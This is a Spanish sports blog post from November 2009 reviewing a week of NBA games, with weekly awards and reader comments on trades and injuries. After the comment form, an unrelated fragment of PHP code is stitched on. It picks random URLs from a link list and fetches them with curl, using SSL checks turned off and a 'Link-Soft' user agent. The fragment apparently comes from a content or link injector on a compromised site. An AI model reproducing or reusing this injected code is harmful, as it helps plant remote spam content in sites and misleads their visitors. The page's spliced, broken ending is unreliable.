Informe Semanal #3

16 de November de 2009 por txusma

¿Porqué todos los jugones sonríen igual?

McMillan no es precisamente un jugón pero ahora mismo debe estar en casa riéndose sin parar y es que su último experimento le está dando unos resultados immejorables. Ha finiquitado el debate de la titularidad de Steve Blake en detrimento de Andre Miller poniendo a los 2 de titulares y desplazando a Brandon Roy a la posición de alero. Extraño pero parece que le da resultados. Veremos por cuanto tiempo.

Cavaliers y Hawks acaban la semana con el casillero de derrotas a 0, lo que sorprende un poco en el caso de los de Atlanta. ¿Quién iba a pensar que a estas alturas liderarían la Conferencia Este? Todas sus piezas funcionan a la perfección y a Jamal Crawford se le ve más centrado que nunca. Cuidadito.

También deben tener una sonrisa de oreja a oreja equipos que no están acostumbrados a acabar immaculados la semana aunque sea jugando solo un par de partidos. Los Kings viven en una nube desde la lesión de su teórico jugador franquicia con un Tyreke Evans que ha explotado definitivamente. Algo parecido pasa en Milwaukee que han descubierto el diamante en bruto que poseen en Brandon Jennings justamente cuando el equipo anda huérfano de líder. A lo mejor ya lo han encontrado. Y finalmente, los Pacers, también han descubierto ha un Danthay Jone que se está destapando como un buen anotador y es el complemento ideal para Danny Granger. Los Celtics pueden dar fe del buen trabajo que están haciendo en Indiana.

Ganarás el pan con el sudor de tu frente

Brillante semana para Mavs y Suns. En Dallas, Dirk mantiene un nivel impresionante y se han sacado de la chistera un Rodrigue Beaubois que se ha hecho con el puesto de titular en ausencia de Josh Howard. En los Suns también tienen su figura indiscutible. El canadiense Steve Nash mantiene la ilusión de los aficionados de la franquicia de Arizona que ven a su equipo en lo más alto de la conferencia Oeste. Algunos dirán que es una posición ficticia pero ahí están. Y bastante sólidos.

Semana en positivo también para Detroit, Orlando, Miami, Denver y San Antonio que han sacado, simplemente, sus partidos adelante.

Toronto, Oklahoma y Golden State acaban la semana en tablas. Los canadienses siguen engranando las piezas conseguidas este verano y se les ve un buena evolución, personificada sobretodo en Calderón que empieza a carburar. Oklahoma va montada en un cohete que se llama Kevin Durant y los Warrios, han de ser conscientes que conseguir sendas victorias frente a Minnesota y New York no es para alegrarse mucho y menos con los problema de indisciplina que tienen. Por su parte, en Houston también han ganado la mitad de los partidos de la semana pero la victoria de ayer en casa de los Lakers les habrá sentado la mar de bien.

Se dejaban llevar

Celtics y Lakers parecen almas gemelas. Después de un inicio de temporada fulgurante han bajado visiblemente el nivel. 2 derrotas esta semana y una sola victoria. En los Lakers falta Pau Gasol pero, ¿qué sucede de repente en los Celtics?

Semanita negativa también para Philadelphia (¿Seguro que este es Elton Brand?), Chicago, Clippers y Memphis.

El Carabasas Club

Knicks y Nets siguen hundiéndose semana a semana en el pozo más profundo de la clasificación. Si fuera Lebron James no sabría por cual de los 2 decidirme en 2010, la verdad. En New Jersey han afectado mucho las lesiones pero ¿cuál es la excusa en New York? ¿No se le acaba nunca el crédito a D’Antoni?

Los Wolves, con un juego interior de risa, también han hecho el ridículo esta semana, así como Wizards (¿en serio se alegran de la vuelta de Arenas?) y Charlotte. Si el estilo de juego de Larry Brown ya no da ni victorías, ¿que les queda?

Capítulo aparte merecen los Hornets que a pesar de ganar un partido esta semana (a los tristes Clippers) se ven immersos en una crisis de difícil solución. Han echado a Byron Scott, se les ha lesionado Chris Paul, el resto de jugadores no carburan… No se ve una salida fácil a corta plazo y de momento ya son el tercer peor equipo del Oeste. ¿Acabará Chris Paul la temporada en New Orleans?

PREMIOS SEMANALES TJNBA

¿Qué has hecho tú que no hayamos hecho los demás?

Los candidatos de esta semana podían ser LeBron, Granger o incluso el mismísimo Jennings… pero tras mates imposibles o canastas de la victoria un tanto afortunadas nuestro MVP de la semana no podía ser otro que Dwyane Wade. 33 puntos por partido, casi 6 rebotes, 5 asistencias, 2 tapones y 2 robos.

Al salir de clase

Brandon Jennings nos ha deslumbrado con dos únicas actuaciones esta semana. Lo bueno, si breve, dos veces bueno y el partidazo de los 55 bien vale el premio del rookie para él. Ya van 3 de 3.

La vida puede ser maravillosa

Dahntay Jones se ha destapado en Indiana como un segundo anotador espectacular. Lo pudieron sufrir en sus carnes los Celtics el otro día, pero el tipo lleva 18.5 en los últimos partidos y un fantástico .50% de efectividad. Además sabe defender ¿qué más se le puede pedir?

Cortocircuitos S.L.

Al que antaño llamaban Mr 20-10 esta semana ya se hubiera dado con un canto en los dientes con llegar a la mitad de esos promedios. No sabemos qué le pasa a Elton Brand, pero él y su equipo no levantan cabeza.

Comenta

17 comentarios a esta entrada

  1. M dice:
    #1

    ¿A Paul le falta un diente?. El otro día a ratos parecía el cuñao cuando lo veía, no sé si será algo del protector bucal, pero quedaba raro de narices, y la foto que poneís me parece más o menos así, aunque se ve pequeño.

    Que bueno que dos veteranos como Nowitzki y Nash sigan dando lecciones, les deseo todo lo mejor. Sobro Celtics y Lakers, me parece más razonable que vayan regulando un poco, creo que habían salido ambos demasiado fuerte para el momento de la temporada en que estamos, y por diversas razones no les convenía. Aunque no sé, esta semana apenas he seguido la competición, e igual han perdido dándolo todo, lo que sería muy preocupante. Atlanta, si se lo cree, puede dar un salto, me parece.

      Citar

  2. sergio dice:
    #2

    Lo de NY podria ser estrategia para alcanzar el pick nº1?? John Wall para sustituir a Duhon y a fichar jugadores franquicia. No olvidemos que este año es casi un premio entrar en la Lottery. Para quedarte 9º en tu Conferencia… quedate ultimo y asi atraes agentes libres (siempre que tengas espacio salarial claro…)

      Citar

  3. sergio dice:
    #3

    Me acabo de enterar (no se si soy el unico ignorante) de que Phil Jackson no es solo el entrenador que mas anillos tiene sino la persona que mas tiene: 10 como entrenador y 2 como jugador (NYK). Bill Russell “solo” (nunca pense que diria “solo” para hablar de Bill) 11 anillos

      Citar

  4. sergio dice:
    #4

    Aunque es cierto que en la temporada 69-70 del anillo de los NYK no se si se lo llegaron a dar por su nula participacion en el equipo

      Citar

  5. Jonatan dice:
    #5

    frye 6-8 en triples esta noche
    quien le ha enseñado a tirar a este chico en 1 año?
    ya yeva 32 triples jaja

      Citar

  6. Love Denise dice:
    #6

    si, frye ya lleva más triples en estos 10 partidos que en sus 4 años anteriores. Esto quizás demuestra la incompetencia de Mcmillan para sacar el máximo provecho de sus jugadores. Mcmillan solo se preocupa de sus protegidos, Roy & Blake.

    No he visto el suns-raptors, pero por la estadística, parece ser que Nash se ha meado en Calderón.
    Y monumento a Adelman ya ¡¡¡¡¡¡¡, muy bien Brooks y Andersen también. En cuanto a Lakers, creo que a Odom se le debe exigir más en ataque,

      Citar

  7. Óscar dice:
    #7

    Pasadas casi tres semanas desde que empezó el baile, para mí lo más sorprendente en lo positivo es el rendimiento y juego de Phoenix y en lo negativo, la trayectoria de Philadelphia, con balance negativo (4-6) a estas alturas, cuando yo pensaba por calendario que podría empezar entre los primeros del Este.
    El quinteto inicial parece temible, con Williams-Iguodala-Young-Brand-Dalembert, pero el equipo no acaba de funcionar cuando están juntos en cancha. Thaddeus Young no termina de sentirse cómodo como “tres”, a pesar de su polivalencia. No acaba de pulir su tiro, siquiera de media distancia (44,3 % en FG, 25% en 3p). El año pasado rindió mucho más como “cuatro”, aprovechando la lesión de Brand. Eso conlleva que Iguodala juegue mucho más de escolta que de alero, posición en la que rindió también más la campaña pasada, al tener más espacios y compañeros con más movilidad en ataque estático, así como más posibilidades de jugar al contraaataque…
    La solución podría pasar por recuperar al cumplidor Willie Green como titular (14 MPG hasta ahora y tirando peor que nunca desde el arco) y reforzar la rotación con el mismo Young, junto a los Ivey (desaprovechado hasta ahora), Holiday, Kapono, Smith o Speights, que por cierto y como esperábamos es de lo mejor hasta ahora del equipo: en 23 minutos,13 ppg, 6,4 rpg, casi un tapón y nada menos que 60,5% en FG…
    Lógicamente, la baja de Andre Miller se deja notar, pero también la de Reggie Evans o Theo Ratliff en el juego interior. El caso de Brand yo sólo me lo explico si está jugando con molestias desde la lesión del año pasado… Ya decían que podía ser una lesión muy complicada en su hombro derecho, incluso crónica. No es el mismo jugador en el contacto, en el cuerpo a cuerpo en el rebote, lo cual siempre ha sido su punto fuerte. Ahí los hombros sufren… Vamos a ver, pero no tiene buena pinta.

      Citar

  8. Love Denise dice:
    #8

    según algunas fuentes, los Grizzlies planean fichar a…… Tinsley!!!!!, por lo que ya sólo les falta para completar la pandilla, un trade Marc Gasol & Conley por Stephen Jackson, fichar como agente libre a Darius Miles, traer a Jermaine O’Neal a cambio de sus próximas 15 elecciones de draft, y trasladar el equipo de Memphis a Compton.
    Al menos, esto va a estar divertido, Chris Wallace, jugón!!!!!

      Citar

  9. sergio dice:
    #9

    Al parecer los Warriors han traspasado a Stephen Jackson a cambio de Radmanovic y Bell de los Bobcats. Al parecer los dos reciben elementos que echaban de menos

      Citar

  10. sergio dice:
    #10

    y Speights ya que hablais de el… fuera de 6 a 8 semanas. Todo buenas noticias en Philly

      Citar

  11. Txusma dice:
    #11

    Jackson ya tiene lo que queria pero vaya que no veo a Radmanovic jugando en este equipo y Bell llega con la muñeca lesionada… Capaz de operarse mañana mismo.

      Citar

  12. Jonatan dice:
    #12

    Bueno para mi salen ganando warriors radmanovic llega para salir desde el banquillo y aportar de 4 ahora que
    hay lesiones y con bell visto lo visto el otro dia en la ciudad de la cerveza se esperaba alguien asi como agua de mayo en este equipo, ademas acaba contrato al año que viene y radmanovic al siguiente.
    Maggette pasara al alero titular y quieras que no era de lo poco salvable en este inicio,
    aun confio en ellis,morrow,randolph,curry….son muy jovenes y jugando juntos pueden llegar lejos

      Citar

  13. sergio dice:
    #13

    Todavia le sobran un par de escoltas… y como juegue Radmanovic de 4 van a recibir puntos a mansalva porque el muchacho no es Mutombo que digamos….

      Citar

  14. Jonatan dice:
    #14

    despues de ver el otro dia a maggette de C defendiendo a Bogut prefiero a Vladi XD

      Citar

  15. M dice:
    #15

    Parece ser que Iverson acaba de rescindir contrato con Grizzlies, según informa Daimiel en su twitter. Habrá que ver si se confirma, y cómo se desarrollan las circnstancias:¿posible desembarco en Atenas o en otro equipo europeo?.

      Citar

  16. Txusma dice:
    #16

    Pero para que quieren los Warriors a Radmanovic teniendo a Anthony Randolph? Va a venir el Serbio a robarle minutos??

      Citar

  17. Uno cualquiera dice:
    #17

    Me alegro del cambio de la web de NBA, ahora va mucho mas fluida (tanto cargando en un inicio como a la hora de navegar por ella).

    Buen partido ayer de Rudy, con 19 puntos (fue el máximo anotador del equipo con unos porcentajes de 7/12 FG y 4/6 3P), 4 rebotes, 4 robos y 2 asistencias en 32 minutos, incluyendo el triple que llevo el partido a la prórroga. Aún así, se acabo la racha de los Blazers.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>